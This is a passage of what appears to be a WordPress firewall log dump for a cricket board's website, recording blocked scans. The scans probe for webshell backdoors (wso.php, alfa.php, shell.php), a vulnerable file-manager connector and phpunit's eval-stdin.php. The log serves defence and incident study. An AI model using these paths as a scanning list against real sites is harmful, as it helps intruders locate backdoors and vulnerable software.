Safari\\/537.36\",\"2\":\"www.google.com\"}','TwDUn5R13EeVAS86XzCfgQm2',0,1673918276.9673,150,'','GET',403,0,700,0,1,'',0),('5.78.57.119',89012599,'','https://yorkshirecricketboard.org.uk/wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7yauW3RQ9CwqABvOh4MEV61l',0,1673918278.1653,197,'','GET',403,0,700,0,1,'',0),('5.78.57.119',89012599,'','https://yorkshirecricketboard.org.uk/wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QORhCWkogAysPxv4fnB7IKat',0,1673918279.3237,229,'','GET',403,0,700,0,1,'',0),('5.78.57.119',89012599,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lIAey4BRsbhmUDvg2QqFYXaj',0,1673918283.2794,275,'','GET',403,0,700,0,1,'',0),('5.78.57.119',89012599,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','iT5QYeWPbKa4n0RgDOpqF7NJ',0,1673918284.5952,339,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ALIux1OHlwh0EQSXckmvi3sB',0,1673932412.4036,1702,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','k6ImtZnpQOwbirUM1q490NFy',0,1673932415.7574,98,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wordpress/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Tvg4CA7dDjWf5wFEqOQG2SV6',0,1673932417.1386,126,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/site/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','fIqQ9dzp0XvsZuh5Snke7otO',0,1673932418.5201,85,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','0FPVDfHyUubtNmklZIpJQE1s',0,1673932421.0722,164,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','MWRIkNgLtq9Gp14ObVvQB0as',0,1673932422.5201,91,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wordpress/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','BnL4OJZKC6k5tTVEXzhcWvDF',0,1673932423.9002,119,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/blog/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','BbpyWtDlgOA61EZhiuwrLvjq',0,1673932425.2388,112,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','QWoRcEN8Ghi4JAXnvt9bOyI2',0,1673932426.5449,94,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','qbr8iwO1430tQUcgdvYFIlyV',0,1673932427.8880,111,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/alfa4.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','VbCpYM4d0iqhjurUfmgoPcax',0,1673932429.2642,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/dz.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','gzYLIScFDTxVdyflm02oRaev',0,1673932430.7359,100,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','HZouBRPQDcszKMk2afCN1bGO',0,1673932432.4680,93,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/sells.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3cmpfCJR6HdWSaXDqugwsk7v',0,1673932433.8381,109,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/info.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','O3ZdkwSHElxG7rjeF4IAvc9u',0,1673932435.1340,110,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','lj8PiwK3Mh5WZX4FIOUtRTJv',0,1673932436.5145,84,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','yQqvH40j9il6uaoVsUOxDMGW',0,1673932437.7971,96,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ZfAIRJP94o1Titv5mSFpU7Q3',0,1673932439.1477,117,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Xf0lYoUInPyWAD83qebSVLOt',0,1673932440.5277,116,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-admin/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','xg6uGFXA0V2DqrpohH4Y39IM',0,1673932441.8782,127,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','DFQ7ge9zTr0WoItYcLXMnxH3',0,1673932443.1947,103,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-includes/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Enfterzy8pv2C0Qacq5dOjlh',0,1673932444.5251,111,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','r5ltFY9TGRmaZO6KAycsSwzH',0,1673932445.8355,104,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/Alfa.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','rimj8KXdkvJEGS6c7H4sWw3x',0,1673932447.2279,99,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','N3z5XOqerR4bsaMDxiSvphPE',0,1673932448.6308,109,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','01wGzINxDKSP9hvW3Tt5mUQZ',0,1673932450.0269,102,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','aqvGpxu2h3LWQPOSIce8XHUn',0,1673932451.3386,100,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','nODsNptwfLWC9EuXQGxU5vmR',0,1673932452.7259,97,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3gu2oqfkiPUm0lG8jyhZzAI6',0,1673932454.0890,82,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','kGFb5fhaIscA0XNQCWxo9ORd',0,1673932455.4125,85,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Dm43r9BqHE0CtxVjPkAblhWU',0,1673932456.7169,306,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/uploads/F0x.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','p4Lne8XwTE5xUVf6MOlhmAJt',0,1673932458.2414,125,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','KPyCQTxEFnpRHh5zadY1w7oc',0,1673932459.7063,114,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-22.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GocuZ6zbhM5xmH1d9AeWLSCV',0,1673932461.4821,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','7IzDp21xSPvcstrZXqbAETUW',0,1673932462.8302,94,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','cTbJ4nI5SqAyDM9gO3wV7QEG',0,1673932464.1460,123,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','bSK1GNcvLY8xm24IoWZFOBTr',0,1673932465.5320,106,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Lva6Y4c1siE2AJy7TRIeKF85',0,1673932466.8858,123,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','PcmaOJYzEh0Cj9t15nQegkwF',0,1673932468.2875,98,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','NU5r634gJTdsf8LIyCWhoaeb',0,1673932469.6441,94,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','daYMEkWcnFuT5tRCb1h8BUeG',0,1673932470.9787,121,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Kug5w4tcNVrYM92TH8yp3mif',0,1673932472.3027,104,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','AQ2I7wYq3mtOP6LyNsZagkdH',0,1673932473.6753,84,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','HTCgNotzbsQmJWZPA8nVh6i7',0,1673932474.9661,112,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/indo.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','SUKhAiHC4wJdpQNy7qZjBxg1',0,1673932476.3115,106,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','QrMJVwEST7fhGlCaWqzy3oZx',0,1673932477.6416,91,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2018.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','w6xuHYB3sdgk5VEeZjRC2vPm',0,1673932479.0171,106,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2019.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mXOxS059RHLdnkqjIWQrflp3',0,1673932480.3240,93,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2020.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Nsfy8Lgrk4OUmM6pVEqR9HbX',0,1673932481.6640,95,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2021.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GNuyqMCRLDwKzrYPAgifcdS1',0,1673932483.0392,89,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2022.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','VWjHfo92t8KUnAxpR4sPOcIE',0,1673932484.4100,113,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-2023.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','n1U2NAuOFGReSPHtJWqz0Vmj',0,1673932485.7444,145,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','7lgcjL6pFPYVBy3GarDwqeH5',0,1673932487.1518,103,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3UzfwcICZqo7LFpvmX50iD9B',0,1673932488.4986,87,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','hdfM6uP7kogAbYIivt2ZyT9m',0,1673932490.1861,145,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/upload.php?mr=exe3','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','EkojlMVqB03fRNxrGXHedSaO',0,1673932491.5739,123,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','7ncDEyUQAoVYuO6vJTS3LxK0',0,1673932492.9498,101,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','4iPg7oDbLAQhBOIMxnf8y3pF',0,1673932494.3131,92,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/indosec.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Yjytg2cGds3r8h5Fxw6Ui0XS',0,1673932495.6540,102,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','J2iLuwWvkTIN1s5Ua0ROCh7D',0,1673932497.0221,95,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/index.php?3x=3x','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','qchT6Gd8ZFwlDpsneR5avI9V',0,1673932498.3458,113,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mBGIpXf0r5xgsjUtQS4ZqPLV',0,1673932499.7569,119,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vp7utnmMXlrUhYNIaeiCws69',0,1673932536.8750,147,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6YtIwQAl4pBhvqUszP0WNy8b',0,1673932538.2201,94,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi-bin/mt/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','Z1TEU97SQtylX5AJjoNk36Yz',0,1673932539.5333,83,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi-bin/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3AUEZa7NoRuveYBMpPxjTO9S',0,1673932540.8515,133,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/mt/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','KU9BSipEjRnIbhgGOqM21FxD',0,1673932542.1859,139,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3ZcvJUq45iBf1dQWgVy89KaA',0,1673932543.5416,122,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/cgi-bin/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','Xgvq4jtPbGNAf05HJECaRxmF',0,1673932544.9049,186,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','NAKpjJVSWRYyMw1rlzu9h57X',0,1673932546.3285,90,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','P1jgUFVv5WoqCpZmhNHQKEsG',0,1673932548.1564,112,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 